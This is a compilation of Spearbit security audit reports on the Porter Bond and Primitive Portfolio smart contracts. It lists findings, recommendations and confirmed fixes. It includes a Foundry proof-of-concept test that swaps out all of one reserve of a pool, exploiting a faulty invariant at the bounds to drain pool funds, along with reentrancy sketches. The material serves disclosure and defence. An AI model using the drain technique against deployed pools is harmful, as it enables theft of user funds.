Severity: Low Risk Context: Bond.sol#L28 Description: After a bond is created its ownership is transferred to the wallet which invoked the createBond function, but it can be later transferred to anyone at any time or the renounceOwnership function can be called. The Bond contract uses the Ownable Openzeppelin contract, which is a simple mechanism to transfer ownership without supporting a two-step ownership transfer pattern. OpenZeppelin describes Ownable as: Ownable is a simpler mechanism with a single owner "role" that can be assigned to a single account. This simpler mechanism can be useful for quick tests but projects with production concerns are likely to outgrow it. Ownership transfer is a critical operation and transferring it to an inaccessible wallet or renouncing ownership by mistake can effectively lock the collateral in the contract forever. Recommendation: It is recommended to implement a two-step transfer ownership mechanism where ownership is transferred and later claimed by a new owner to confirm the whole process and prevent a lockout. Because the OpenZeppelin ecosystem does not provide such implementation it has to be developed in-house. For inspiration BoringOwnable can be considered. However, it has to be well tested especially in case it is integrated with other OpenZeppelin contracts used by the project. Porter: Confirms and accepts the risks. The team will consider two-step ownership transfer for future contracts. Spearbit: Acknowledged. +5.2.3 Inefficient initialization of minimal proxy implementation Severity: Low Risk Context: BondFactory.sol#L71, deploy_bond_factory.ts#L24 Description: The Bond contract uses a minimal proxy pattern when deployed by BondFactory. The proxy pattern requires a special initialize method to be called to set the state of each cloned contract. Nevertheless, the implementation contract can be left uninitialized, giving an attacker the opportunity to invoke the initialization. constructor() { tokenImplementation = address(new Bond()); _grantRole(DEFAULT_ADMIN_ROLE, _msgSender()); } After the reporting the issue it was discovered that a separate (not merged) development branch implements a deployment script which initializes the Bond implementation contract after the main deployment of BondFactory, leaving a narrow window for the attacker to leverage this issue and reducing impact significantly. deploy_bond_factory.ts#L24 6 const implementationContract = (await ethers.getContractAt( "Bond", await factory.tokenImplementation() )) as Bond; try { await waitUntilMined( await implementationContract.initialize( "Placeholder Bond", "BOND", deployer, THREE_YEARS_FROM_NOW_IN_SECONDS, "0x0000000000000000000000000000000000000000", "0x0000000000000000000000000000000000000001", ethers.BigNumber.from(0), ethers.BigNumber.from(0), 0 ) ); } catch (e) { console.log("Is the contract already initialized?"); console.log(e); } Due to the fact that the initially reviewed code did not have the proper initialization for the Bond implementation (as it was an unmerged branch) and because in case of a successful exploitation the impact on the system remains minimal, this finding is marked as low risk. It is not necessary to create a separate transaction and initialize the storage of the implementation contract to prevent unauthorized initialization. Recommendation: OpenZeppelin’s minimal proxy pattern implements a more efficient (less gas) and elegant way to lock the implementation contract by simply invoking _disableInitializers(), thus this solution is recom- mended instead of the current mechanism. Porter: Implemented in PR #262. Spearbit: Acknowledged, recommendation has been implemented. 5.3 Gas Optimization +5.3.1 Verify amount is greater than 0 to avoid unnecessarily safeTransfer() calls Severity: Gas Optimization Context: Bond.sol#L263 Description: Balance should be checked to avoid unnecessary safeTransfer() calls with an amount of 0. Recommendation: Implement a check to make sure amount > 0 to avoid unnecessary safeTransfer() calls. + + + uint256 sweepingTokenBalance = sweepingToken.balanceOf(address(this)); if (sweepingTokenBalance == 0) { revert ZeroAmount(); } sweepingToken.safeTransfer(receiver, sweepingTokenBalance); Porter: Implemented in PR #287. Spearbit: Acknowledged, recommendation has been implemented. 7 5.4 Informational +5.4.1 Improve checks for token allow-list Severity: Informational Context: BondFactory.sol#L93 Description: The BondFactory contract has two enabled allow-lists by default, which require the team’s approval for issuers and tokens to create bonds. However, the screening process was not properly defined before the assessment. In case a malicious token and issuer slip through the screening process the protocol can be used by malicious actors to perform mass scam attacks. In such scenario, tokens and issuers would be able to create bonds, sell those anywhere and later on exploit those tokens, leading to loss of user funds. /// @inheritdoc IBondFactory function createBond( string memory name, string memory symbol, uint256 maturity, address paymentToken, address collateralToken, uint256 collateralTokenAmount, uint256 convertibleTokenAmount, uint256 bonds ) external onlyIssuer returns (address clone) Recommendation: Consider • Ensuring that all tokens are checked and passed through checklist. • Use automation and scripts to cover this checklist as thoroughly as possible in form of e.g. a report. • Add logic to support inclusion/exclusion of such tokens or document the non-support warning explicitly to users. Porter: Since The Team has a checklist for tokens that can be used as a payment or collateral token, this safeguard should act to prevent malicious type of token. Spearbit: Acknowledged (solution based on procedures, not technical). +5.4.2 Incorrect revert message Severity: Informational Context: Bond#L81, IBond.sol#14 Description: error BondBeforeGracePeriodOrPaid() is used to revert when !isAfterGracePeriod() && amountPaid() > 0, which means the bonds is before the grace period and not paid for. Therefore, the error description is incorrect. if (isAfterGracePeriod() || amountUnpaid() == 0) { _; } else { revert BondBeforeGracePeriodOrPaid(); } Recommendation: Consider changing this error name to BondBeforeGracePeriodAndNotPaid(), and also cor- rect the related Natspec description. Porter: Implemented in PR #282. Spearbit: Solution is implemented. 8 +5.4.3 Non-existent bonds naming/symbol restrictions Severity: Informational Context: BondFactory.sol#L93 Description: The issuer can define any name and symbol during bond creation. Naming is neither enforced nor constructed by the contract and may result in abusive or misleading names which could have a negative impact on the PR of the project. /// @inheritdoc IBondFactory function createBond( string memory name, string memory symbol, uint256 maturity, address paymentToken, address collateralToken, uint256 collateralTokenAmount, uint256 convertibleTokenAmount, uint256 bonds ) external onlyIssuer returns (address clone) A malicious user could hypothetically use arbitrary names to: • Mislead users into thinking they are buying bonds consisting of different tokens. • Use abusive names to discredit the team. • Attempt to exploit the frontend application by injecting arbitrary HTML data. The team had a discussion regarding naming conventions in the past. However, not all the abovementioned scenarios were brought up during that conversation. Therefore, this finding is reported as informational to revisit and estimate its potential impact, or add it as a test case during the web application implementation. Recommendation: Consider revisiting the design decision regarding arbitrary names and symbols supplied by end-users in the context of the previously described risks. Especially important is the latest scenario regard- ing potential HTML injection, which has to be taken into consideration and properly mitigated in web application implementations. It is recommended to decide on naming conventions and enforce them programmatically, ideally at the smart contract level as any implementation in the UI can be easily bypassed. Porter: The team understands the risks and potential abuses and will consider it in discussions regarding naming formats. Verified it does not impact on the front-end. Spearbit: Acknowledged. +5.4.4 Needles variable initialization for default values Severity: Informational Context: Bond.sol#L333 Description: uint256 variable are initialized to a default value of zero per Solidity docs. Setting a variable to the default value is unnecessary. Recommendation: Remove explicit initialization for default values. Porter: Implemented in PR #283. Spearbit: Acknowledged, solution has been implemented. 9 +5.4.5 Deflationary payment tokens are not handled in the pay() function Severity: Informational Context: Bond.sol#L145 Description: The pay() function does not support rebasing/deflationary/inflationary payment tokens whose balance changes during transfers or over time. The necessary checks include at least verifying the amount of tokens transferred to contracts before and after the actual transfer to infer any fees/interest. Recommendation: Consider verifying that the previous balance and the future balance equals to amount for any rebasing/inflation/deflation reward tokens. + uint balanceBefore = IERC20Metadata(paymentToken).balanceOf(address(this)); IERC20Metadata(paymentToken).safeTransferFrom( msg.sender, address(this), amount ); + + + uint balanceAfter = IERC20Metadata(paymentToken).balanceOf(address(this)); uint amountDiff = balanceAfter - balanceBefore; emit Payment(msg.sender, amountDiff); Porter: Implemented in PR #285. Spearbit: Acknowledged, solution has been implemented. 10 6 Additional Comments Additionally, to the audit report a full foundry-based fuzzing testing and CI setup was provided after the assessment to improve the security posture of the project 11 diff --git a/findings_newupdate/spearbit/Primitive-Spearbit-Security-Review-July.txt b/findings_newupdate/spearbit/Primitive-Spearbit-Security-Review-July.txt new file mode 100644 index 0000000..b5f4fdc --- /dev/null +++ b/findings_newupdate/spearbit/Primitive-Spearbit-Security-Review-July.txt @@ -0,0 +1,13 @@ +5.1.1 tradingFunction returns wrong invariant at bounds, allowing to steal all pool reserves Severity: Critical Risk Context: NormalStrategyLib.sol#L157-L165 Description: The tradingFunction computing the invariant value of k = Φ¹(y/K) - Φ¹(1-x) + στ returns the wrong value at the bounds of x and y. The bounds of x are 0 and 1e18, the bounds of y are 0 and K, the strike price. If x or y is at these bounds, the corresponding term's computation is skipped and therefore implicitly set to 0, its initialization value. int256 invariantTermX; // Φ¹(1-x) // @audit if x is at the bounds, the term remains 0 if (self.reserveXPerWad.isBetween(lowerBoundX + 1, upperBoundX - 1)) { invariantTermX = Gaussian.ppf(int256(WAD - self.reserveXPerWad)); } int256 invariantTermY; // Φ¹(y/K) // @audit if y is at the bounds, the term remains 0 if (self.reserveYPerWad.isBetween(lowerBoundY + 1, upperBoundY - 1)) { invariantTermY = Gaussian.ppf( int256(self.reserveYPerWad.divWadUp(self.strikePriceWad)) ); } Note that Φ¹ = Gaussian.ppf is the probit function which is undefined at 0 and 1.0, but tends towards -infinity at 0 and +infinity at 1.0 = 1e18. (The closest values used in the Solidity approximation are Gaussian.ppf(1) = -8710427241990476442 ~ -8.71 and Gaussian.ppf(1e18-1) = 8710427241990476442 ~ 8.71.) This fact can be abused by an attacker to steal the pool reserves. For example, the y-term Φ¹(y/K) will be a negative value for y/K < 0.5. Trading out all y reserve, will compute the new invariant with y set to 0 and the y-term Φ¹(y/K) = Φ¹(0) = -infinity is set to 0 instead, increasing the overall invariant, accepting the swap. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import "solmate/utils/SafeCastLib.sol"; import "./Setup.sol"; contract TestSpearbit is Setup { using SafeCastLib for uint256; using AssemblyLib for uint256; using AssemblyLib for uint128; using FixedPointMathLib for uint256; using FixedPointMathLib for uint128; function test_swap_all_out() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { (uint256 reserveAsset, uint256 reserveQuote) = subject().getPoolReserves(ghost().poolId); bool sellAsset = true; uint128 amtIn = 2; // pass reserve-not-stale check after taking fee uint128 amtOut = uint128(reserveQuote); 4 uint256 prev = ghost().quote().to_token().balanceOf(actor()); Order memory order = Order({ useMax: false, poolId: ghost().poolId, input: amtIn, output: amtOut, sellAsset: sellAsset }); subject().swap(order); uint256 post = ghost().quote().to_token().balanceOf(actor()); assertTrue(post > prev, "swap-failed"); } } Recommendation: The terms for values at the bounds Φ¹(y/K) and Φ¹(1-x) may not be set to zero as they would mathematically correspond to +/- infinity, resulting in a wrong invariant value. Swapping out all reserves should not be possible. As there are several other problems with one reserve value being zero, we recommend disallowing swapping out all reserves. Note that deallocating should already not allow zeroing a reserve as some initial LP tokens are locked and the deallocated amounts are rounded down. Primitive: Fixed commit 743829. • Checks if either reserve is gte a respective bound. If it is, set it as close to the bound as possible, but not at the bound so the Gaussian.ppf function does not revert. • If one of the reserves is set very close to its bound, the other reserve will need to be very close to its opposite bound, else the invariant will be very negative. • Adds a check in adjustReserves which gets triggered during a swap to revert if either virtualX or virtualY are zero. • Removes the overwritten deltaLiquidity value that would allow 0 allocates to happen in getPoolMaxLiquidity. • Also note that I updated the 'min delta' value in the invariant tests. It looks like if either of the reserves are If the delta is 2 or less, there's some changed by >= 3 wei then the trading function is strictly monotonic. cases where the invariant does not change. Spearbit: Fixed. 5.2 Medium Risk +5.2.1 getSpotPrice, approximateReservesGivenPrice, getStrategyData ignore time to maturity Severity: Medium Risk Context: NormalStrategyLib.sol#L375 Description: When calling getSpotPrice, getStrategyData or approximateReservesGivenPrice, the pool con- fig is transformed into a NormalCurve struct. This transformation always sets the time to maturity field to the entire duration 5 function transform(PortfolioConfig memory config) pure returns (NormalCurve memory) { return NormalCurve({ reserveXPerWad: 0, reserveYPerWad: 0, strikePriceWad: config.strikePriceWad, standardDeviationWad: config.volatilityBasisPoints.bpsToPercentWad(), timeRemainingSeconds: config.durationSeconds, invariant: 0 }); } Neither is the curve.timeRemainingSeconds value overridden with the correct value for the mentioned functions. The reported spot price will be wrong after the pool has been initialized and integrators cannot rely on this value. Recommendation: Initialize the timeRemainingSeconds value in transform to the current time remainings value or set it to the correct value afterwards for functions where it is needed. It should use a value similar to what computeTau(..., block.timestamp) returns. Consider adding additional tests for the affected functions for pools that have been active for a while. Primitive: Fixed in commit 15ee0f. Spearbit: Fixed. It was changed for getSpotPrice, comments have been added to the other functions. 5.3 Low Risk +5.3.1 Numerical error on larger trades favors the swapper relative to mathematically ideal pricing Severity: Low Risk Context: File.sol#L123 Description: To test the accuracy of the Solidity numerical methods used, a Python implementation of the swap logic was created using a library that supports arbitrary precision (https://mpmath.org/). Solidity swap execu- tions generated in a custom fuzz test were compared against arbitrary precision results using Foundry's ffi feature (https://book.getfoundry.sh/forge/differential-ffi-testing). Cases where the "realized" swap price was better for the swapper than the "ideal" swap price were flagged. Deviations in the swapper's favor as large as 25% were observed (and larger ones likely exist). These seem to be a function of the size of the swap made--larger swaps favor the swapper more than smaller swaps (in fact, deviations were observed to trend towards zero as swap size relative to pool size decreased). It is unclear if there's any problem in practice from this behavior--large swaps will still incur large slippage and are only incentivized when the price has "jumped" drastically; fees also help make up for losses. Without going further, it can be stated that there is a risk for pools with frequent discontinuous price changes to track the theoretical payoff more poorly, but further numerical investigations are needed to determine whether there's a serious concern. The test cases below require the simulation repo to be cloned into a Python virtual environment in a directory named primitive-math-venv with the needed dependencies at the same directory hierarchy level as the port- folio repository. That is, the portfolio/ directory and primitive-math-venv/ directories should be in the same folder, and the primitive-math-venv/ folder should contain the primitive-sim repository. The virtual environ- ment needs to be activated and have the mpmath, scipy, numpy, and eth_abi dependencies installed via pip or another method. Alternatively, these can be installed globally in which case the primitive-math-venv directory does not need to be a virtual environment. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import "solmate/utils/SafeCastLib.sol"; import "./Setup.sol"; 6 contract TestNumericalDeviation is Setup { using SafeCastLib for uint256; using AssemblyLib for uint256; using AssemblyLib for uint128; using FixedPointMathLib for uint256; using FixedPointMathLib for uint128; bool printLogs = true; function _fuzz_random_args( bool sellAsset, uint256 amountIn, uint256 amountOut ) internal returns (bool swapExecuted) { Order memory maxOrder = subject().getMaxOrder(ghost().poolId, sellAsset, actor()); amountIn = bound(amountIn, maxOrder.input / 1000 + 1, maxOrder.input); amountOut = subject().getAmountOut(ghost().poolId, sellAsset, amountIn, actor()); if (printLogs) console.log("amountOut: ", amountOut); Order memory order = Order({ useMax: false, poolId: ghost().poolId, input: amountIn.safeCastTo128(), output: amountOut.safeCastTo128(), sellAsset: sellAsset }); try subject().simulateSwap({ order: order, timestamp: block.timestamp, swapper: actor() }) returns (bool swapSuccess, int256 prev, int256 post) { try subject().swap(order) { assertTrue( swapSuccess, "simulateSwap-failed but swap succeeded" ); assertTrue(post >= prev, "post-invariant-not-gte-prev"); swapExecuted = true; } catch { assertTrue( !swapSuccess, "simulateSwap-succeeded but swap failed" ); } } catch { // pass this case } } struct TestVals { uint256 strike; uint256 volatility_bps; uint256 durationSeconds; uint256 ttm; } // fuzzing entrypoint used to find violating swaps function test_swap_deviation(uint256 amtIn, uint256 amtOut) 7 public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_start: ", preXPerL); console.log("y_start: ", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log("strike: ", tv.strike); console.log("volatility_bps: ", tv.volatility_bps); console.log("durationSeconds: ", tv.durationSeconds); console.log("creationTimestamp: ", creationTimestamp); console.log("block.timestamp: ", block.timestamp); console.log("ttm: ", tv.ttm); console.log("protocol fee: ", subject().protocolFee()); console.log("pool fee: ", pool.feeBasisPoints); console.log("pool priority fee: ", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log("sellAsset: ", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_end: ", postXPerL); console.log("y_end: ", postYPerL); } = "python3"; = "../primitive-math-venv/primitive-sim/check_swap_result.py"; = "--x"; = vm.toString(preXPerL); = "--y"; = vm.toString(preYPerL); = "--strike"; = vm.toString(tv.strike); = "--vol_bps"; = vm.toString(tv.volatility_bps); string[] memory cmds = new string[](18); cmds[0] cmds[1] cmds[2] cmds[3] cmds[4] cmds[5] cmds[6] cmds[7] cmds[8] cmds[9] cmds[10] = "--duration"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = "--ttm"; cmds[13] = vm.toString(tv.ttm); 8 cmds[14] = "--xprime"; cmds[15] = vm.toString(postXPerL); cmds[16] = "--yprime"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalDependentPerL) = abi.decode(result, (uint256)); if (printLogs) console.log("idealFinalDependentPerL: ", idealFinalDependentPerL); uint256 postDependentPerL = sellAsset ? postYPerL : postXPerL; // Only worried if swap was _better_ than ideal if (idealFinalDependentPerL > postDependentPerL) { uint256 diff = idealFinalDependentPerL - postDependentPerL; uint256 percentErrWad = diff * 1e18 / idealFinalDependentPerL; if (printLogs) console.log("%% err wad: ", percentErrWad); // assert at worst 25% error assertLt(percentErrWad, 0.25 * 1e18); } } function test_swap_gt_2pct_dev_in_swapper_favor() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { uint256 amtIn = 6552423086988641261559668799172253742131420409793952225706522955; uint256 amtOut = 0; PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_start: ", preXPerL); console.log("y_start: ", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log("strike: ", tv.strike); console.log("volatility_bps: ", tv.volatility_bps); console.log("durationSeconds: ", tv.durationSeconds); console.log("creationTimestamp: ", creationTimestamp); console.log("block.timestamp: ", block.timestamp); console.log("ttm: ", tv.ttm); console.log("protocol fee: ", subject().protocolFee()); console.log("pool fee: ", pool.feeBasisPoints); console.log("pool priority fee: ", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log("sellAsset: ", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); 9 if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_end: ", postXPerL); console.log("y_end: ", postYPerL); } = "python3"; = "../primitive-math-venv/primitive-sim/check_swap_result.py"; = "--x"; = vm.toString(preXPerL); = "--y"; = vm.toString(preYPerL); = "--strike"; = vm.toString(tv.strike); = "--vol_bps"; = vm.toString(tv.volatility_bps); string[] memory cmds = new string[](18); cmds[0] cmds[1] cmds[2] cmds[3] cmds[4] cmds[5] cmds[6] cmds[7] cmds[8] cmds[9] cmds[10] = "--duration"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = "--ttm"; cmds[13] = vm.toString(tv.ttm); cmds[14] = "--xprime"; cmds[15] = vm.toString(postXPerL); cmds[16] = "--yprime"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalYPerL) = abi.decode(result, (uint256)); if (printLogs) console.log("idealFinalYPerL: ", idealFinalYPerL); // Only worried if swap was _better_ than ideal if (idealFinalYPerL > postYPerL) { uint256 diff = idealFinalYPerL - postYPerL; uint256 percentErrWad = diff * 1e18 / idealFinalYPerL; if (printLogs) console.log("%% err wad: ", percentErrWad); // assert at worst 2% error assertLt(percentErrWad, 0.02 * 1e18); } } function test_swap_gt_5pct_dev_in_swapper_favor() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { uint256 amtIn = 524204019310836059902749478707356665714276202503631350973429403; uint256 amtOut = 0; PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_start: ", preXPerL); console.log("y_start: ", preYPerL); } TestVals memory tv; 10 { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log("strike: ", tv.strike); console.log("volatility_bps: ", tv.volatility_bps); console.log("durationSeconds: ", tv.durationSeconds); console.log("creationTimestamp: ", creationTimestamp); console.log("block.timestamp: ", block.timestamp); console.log("ttm: ", tv.ttm); console.log("protocol fee: ", subject().protocolFee()); console.log("pool fee: ", pool.feeBasisPoints); console.log("pool priority fee: ", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log("sellAsset: ", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_end: ", postXPerL); console.log("y_end: ", postYPerL); } = "python3"; = "../primitive-math-venv/primitive-sim/check_swap_result.py"; = "--x"; = vm.toString(preXPerL); = "--y"; = vm.toString(preYPerL); = "--strike"; = vm.toString(tv.strike); = "--vol_bps"; = vm.toString(tv.volatility_bps); string[] memory cmds = new string[](18); cmds[0] cmds[1] cmds[2] cmds[3] cmds[4] cmds[5] cmds[6] cmds[7] cmds[8] cmds[9] cmds[10] = "--duration"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = "--ttm"; cmds[13] = vm.toString(tv.ttm); cmds[14] = "--xprime"; cmds[15] = vm.toString(postXPerL); cmds[16] = "--yprime"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalYPerL) = abi.decode(result, (uint256)); if (printLogs) console.log("idealFinalYPerL: ", idealFinalYPerL); // Only worried if swap was _better_ than ideal if (idealFinalYPerL > postYPerL) { uint256 diff = idealFinalYPerL - postYPerL; uint256 percentErrWad = diff * 1e18 / idealFinalYPerL; if (printLogs) console.log("%% err wad: ", percentErrWad); 11 // assert at worst 2% error assertLt(percentErrWad, 0.05 * 1e18); } } function test_swap_gt_25pct_dev_in_swapper_favor() public defaultConfig useActor usePairTokens(10 ether) allocateSome(1 ether) { uint256 amtIn = 110109023928019935126448015360767432374367360662791991077231763772041488708545; uint256 amtOut = 0; PortfolioPool memory pool = ghost().pool(); (uint256 preXPerL, uint256 preYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_start: ", preXPerL); console.log("y_start: ", preYPerL); } TestVals memory tv; { uint256 creationTimestamp; (tv.strike, tv.volatility_bps, tv.durationSeconds, creationTimestamp,) = NormalStrategy(pool.strategy).configs(ghost().poolId); tv.ttm = creationTimestamp + tv.durationSeconds - block.timestamp; if (printLogs) { console.log("strike: ", tv.strike); console.log("volatility_bps: ", tv.volatility_bps); console.log("durationSeconds: ", tv.durationSeconds); console.log("creationTimestamp: ", creationTimestamp); console.log("block.timestamp: ", block.timestamp); console.log("ttm: ", tv.ttm); console.log("protocol fee: ", subject().protocolFee()); console.log("pool fee: ", pool.feeBasisPoints); console.log("pool priority fee: ", pool.priorityFeeBasisPoints); } } bool sellAsset = true; if (printLogs) console.log("sellAsset: ", sellAsset); { bool swapExecuted = _fuzz_random_args(sellAsset, amtIn, amtOut); if (!swapExecuted) return; // not interesting to check swap if it didn't execute } pool = ghost().pool(); (uint256 postXPerL, uint256 postYPerL) = (pool.virtualX, pool.virtualY); if (printLogs) { console.log("x_end: ", postXPerL); console.log("y_end: ", postYPerL); } string[] memory cmds = new string[](18); cmds[0] cmds[1] cmds[2] cmds[3] cmds[4] = "python3"; = "../primitive-math-venv/primitive-sim/check_swap_result.py"; = "--x"; = vm.toString(preXPerL); = "--y"; 12 = vm.toString(preYPerL); = "--strike"; = vm.toString(tv.strike); = "--vol_bps"; = vm.toString(tv.volatility_bps); cmds[5] cmds[6] cmds[7] cmds[8] cmds[9] cmds[10] = "--duration"; cmds[11] = vm.toString(tv.durationSeconds); cmds[12] = "--ttm"; cmds[13] = vm.toString(tv.ttm); cmds[14] = "--xprime"; cmds[15] = vm.toString(postXPerL); cmds[16] = "--yprime"; cmds[17] = vm.toString(postYPerL); bytes memory result = vm.ffi(cmds); (uint256 idealFinalYPerL) = abi.decode(result, (uint256)); if (printLogs) console.log("idealFinalYPerL: ", idealFinalYPerL); // Only worried if swap was _better_ than ideal if (idealFinalYPerL > postYPerL) { uint256 diff = idealFinalYPerL - postYPerL; uint256 percentErrWad = diff * 1e18 / idealFinalYPerL; if (printLogs) console.log("%% err wad: ", percentErrWad); // assert at worst 25% error assertLt(percentErrWad, 0.25 * 1e18); } } } Recommendation: Do more thorough numerical testing to determine under what conditions swap pricing deviates from "ideal" and whether this is a practical concern. Spearbit: No comment. Marking as acknowledged. +5.3.2 getMaxOrder overestimates output values Severity: Low Risk Context: NormalStrategy.sol#L230-L237 Description: The getMaxOrder function adds + 1 to the output value, overestimating the output value. This can lead to failed swaps if this value is used. tempOutput = pool.virtualY - lowerY.mulWadDown(pool.liquidity) + 1; also easy It's erY.mulWadDown(pool.liquidity) + 1 = pool.virtualY + 1, more than the pool reserves. that with lowerY = 0 we see to have i.e., tempOutput = pool.virtualY - low- the max out amount would be Recommendation: Consider subtracting 1 instead of adding 1. Primitive: Fixed in commit f0b6d4. Spearbit: Fixed. 13 +5.3.3 Improve reentrancy guards Severity: Low Risk Context: Portfolio.sol#L124 Description: Previously, only settlement performed calls to arbitrary addresses through ERC20 transfers. With recent additions, like the ERC1155._mint and user-provided strategies, single actions like allocate and swap also perform calls to potentially malicious contracts. This increases the attack surface for reentrancy attacks. The current way of protecting against reentrancy works by setting multicall flags (_currentMulticall) and locks (preLock() and postLock()) on multicalls and single-action calls. However, the single calls essentially skip reen- trancy guards if the outer context is a multicall. This still allows for reentrancy through control flows like the following: // reenter during multicall's action execution multicall preLock() singleCall() reenter during current execution singeCall() preLock(): passes because we're in multicall skips settlement postLock(): passes because we're in multicall _currentMulticall = false; settlement() postLock() // reenter during multicall's settlement multicall preLock() singleCall preLock(): ... postLock(): `_locked = 1` _currentMulticall = false; settlement() reenter singeCall() passes preLock because not locked mutliCall() passes multicall reentrancy guard because not in multicall passes preLock because not locked ... settlement finishes postLock() Recommendation: While it's not obvious how to exploit the reentrancy issues, we propose improving the reen- trancy guards. The main issue is that the current reentrancy lock has no "depth information", it does not know if an action that is run during a multicall execution is part of the original scheduled multicall actions or an injected one. By adjusting the _locked field to count the reentrancy call depth (instead of resetting it on any _preLock/_postLock) we can ensure that only the originally defined multicall actions are run. 14 function _preLock() private { if (_locked != 1 && !_currentMulticall) { revert Portfolio_InvalidReentrancy(); } // if it has been locked before: `_locked != 1` // revert if not in a multicall. `!_currentMulticall` (singleCall -> singleCall reentrancy) // or revert if in a multicall and this was called from another singleCall. `_locked > 2` (multiCall -> singleCall -> singleCall reentrancy) if (_locked != 1 && (!_currentMulticall || _locked > 2)) { revert Portfolio_InvalidReentrancy(); } _locked = 2; _locked++; - - - + + + ,! + + + - + } function _postLock() private { - + _locked = 1; _locked--; // Reverts if the account system was not settled after a normal call. if (!__account__.settled && !_currentMulticall) { revert Portfolio_InvalidSettlement(); } } Note that after a successful transaction, the _locked field is reset to its original value as each _preLock has a single corresponding _postLock, and vice versa. Primitive: Fixed in commit 4bf82d. Spearbit: Fixed. Recommendation was implemented. 5.4 Gas Optimization +5.4.1 approximatePriceGivenX does not need to compute y-bounds Severity: Gas Optimization Context: NormalStrategyLib.sol#L308 Description: The approximatePriceGivenX function does not need to compute the y-bounds by calling self.getReserveYBounds(). Recommendation: Consider removing this call. Primitive: Fixed in commit f994c2. Spearbit: Fixed. 15 +5.4.2 Unnecessary computations in NormalStrategy.beforeSwap Severity: Gas Optimization Context: NormalStrategy.sol#L87 Description: The NormalStrategy.sol.beforeSwap function calls getSwapInvariants to simulate an entire swap with current and post-swap invariants. However, only the current invariant value is used. Recommendation: Consider calculating the current invariant only instead of calling getSwapInvariants. This also eliminates having to create a fake order with an input and output of 2 to make the swap simulation pass. The invariant computation should use the same rounding as done in getSwapInvariants. Primitive: Fixed in commit a39126. Spearbit: Fixed. 5.5 Informational +5.5.1 Pools can use malicious strategies Severity: Informational Context: Portfolio.sol#L671 Description: Anyone can create pools and configure the pool to use a custom strategy. A malicious strategy can disable swapping and (de-)allocating at any time, as well as enable privileged parties to trade out all pool reserves by implementing custom logic in the validateSwap function. Recommendation: When users trade or provide liquidity in unofficial strategies they risk losing their funds. Users should thoroughly check the strategy of the pool before engaging with it. Primitive: Fixed here commit acb0cf. They were in the right place in createPool, but the function arguments for encode were in the wrong place so I switched them around. Also added tests for all the combinations. Spearbit: Acknowledged. +5.5.2 findRootForSwappingIn functions should use MINIMUM_INVARIANT_DELTA Severity: Informational Context: NormalStrategyLib.sol#L654, NormalStrategy.sol#L11 Description: The findRootForSwappingInX and findRootForSwappingInY functions add + 1 to the previous curve invariant tradingFunction(curve) - (curve.invariant + 1) Recommendation: Instead of adding + 1, consider using adding + MINIMUM_INVARIANT_DELTA instead. Finding a root for this function then yields the desired output of finding curve values such that newInvar - (prevInvar + delta) >= 0 newInvar - prevInvar - delta >= 0 newInvar - prevInvar >= delta This matches the swap invariant check in _validateSwap. Primitive: Fixed in commit 973230. Spearbit: Fixed. 16 +5.5.3 Unused Errors Severity: Informational Context: NormalStrategyLib.sol#L48-L49 Description: The NormalStrategyLib_UpperPriceLimitReached and NormalStrategyLib_LowerPriceLim- itReached errors are not used. Recommendation: Consider using these errors or removing them. Primitive: Fixed in commit 3bd709. Spearbit: Fixed. +5.5.4 getSwapInvariants order output can be 1 instead of 2 Severity: Informational Context: NormalStrategy.sol#L91, NormalStrategy.sol#L180, SwapLib.sol#L133 Description: The getSwapInvariants function is used to simulate swaps for the getAmountOut and beforeSwap functions. These functions use an artificial output value of 2 such that the function does not revert. Recommendation: The output value can be reduced to 1 instead as there is no fee on the output value and the only check on the output reserves is that they changed. 